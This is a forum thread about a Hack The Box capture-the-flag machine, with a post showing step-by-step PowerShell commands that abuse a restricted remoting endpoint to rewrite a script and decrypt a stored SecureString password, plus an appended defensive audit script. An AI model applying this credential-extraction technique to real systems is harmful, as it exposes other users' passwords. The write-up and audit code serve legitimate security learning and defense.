Acute HTB Writeup
(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute




Edit: I have added my personal findings for those who want to reverse the SecureString of user jmorgan
This is for learning purposes
Do it after you pwn the box

Note: We cannot run many commands as the imonks user. We can check by running this:
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {get-command}



We can use Set-Content, so we replace the last line in the PowerShell script on the imonks user's desktop

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {((cat "C:\Users\imonks\Desktop\wm.ps1") -replace 'Invoke-Command -ScriptBlock \{Get-Volume} -ComputerName Acute-PC01 -Credential \$creds','[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))') |set-content -path "C:\Users\imonks\Desktop\wm.ps1"}


We can cat the script to see if it was written

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {cat C:\Users\imonks\Desktop\wm.ps1}


Final Script should look like this

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))



After which we run it
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {C:\Users\imonks\Desktop\wm.ps1}


We have successfully decrypted the SecureString password

Note:
ConvertTo-SecureString uses a key, thus preventing us from decrypting the password on another machine.
So we have to do it on the host only.



Hope you learned something
Leave a Rep if that helped

thxxxxx
Reply
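Added example, not part of the original post: the stored value in the script above begins with the fixed DPAPI blob header (version 1 plus the DPAPI provider GUID), so scripts that embed such credentials can be found by pattern and checked for who else is allowed to modify them. The `$Root` parameter and the `$expected` allow-list are assumptions to adjust for your environment.

```powershell
# Audit sketch: locate scripts that embed DPAPI-protected SecureString blobs
# and list principals, other than the expected ones, who can modify them.
# Assumption: $Root is a hypothetical parameter; point it at the tree to audit.
param([string]$Root = 'C:\Users')

# A DPAPI blob starts with version 1 followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb, so ConvertFrom-SecureString output
# (when no -Key is given) always begins with these 40 hex characters.
$dpapiHeader = '01000000d08c9ddf0115d1118c7a00c04fc297eb'

# Rights that allow changing the script's content or its ACL.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Assumption: principals that are expected to hold write access.
$expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

Get-ChildItem -Path $Root -Recurse -File -Include *.ps1, *.psm1 -ErrorAction SilentlyContinue |
    Select-String -Pattern "$dpapiHeader[0-9a-f]+" -List |
    ForEach-Object {
        $hit = $_                                  # first matching line in the file
        $acl = Get-Acl -LiteralPath $hit.Path

        # Allow ACEs that grant any write-type right to an unexpected principal.
        $writers = $acl.Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                ([int]($_.FileSystemRights -band $writeMask) -ne 0) -and
                ($expected -notcontains $_.IdentityReference.Value)
            } |
            ForEach-Object { $_.IdentityReference.Value } |
            Sort-Object -Unique

        [pscustomobject]@{
            Script       = $hit.Path
            Line         = $hit.LineNumber
            Owner        = $acl.Owner
            OtherWriters = $writers -join ', '
        }
    }
```

Any row with a non-empty `OtherWriters` column is a script whose stored credential can be exposed by an account other than its owner, which is the condition the post relies on.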
nice :) :) :) :)
Reply
Thanks
Reply
thanks!
Reply
nice bro
Reply
ppppppppppppppppppppppppp
Reply
......................
Reply
gracias
Reply
'''''''
Reply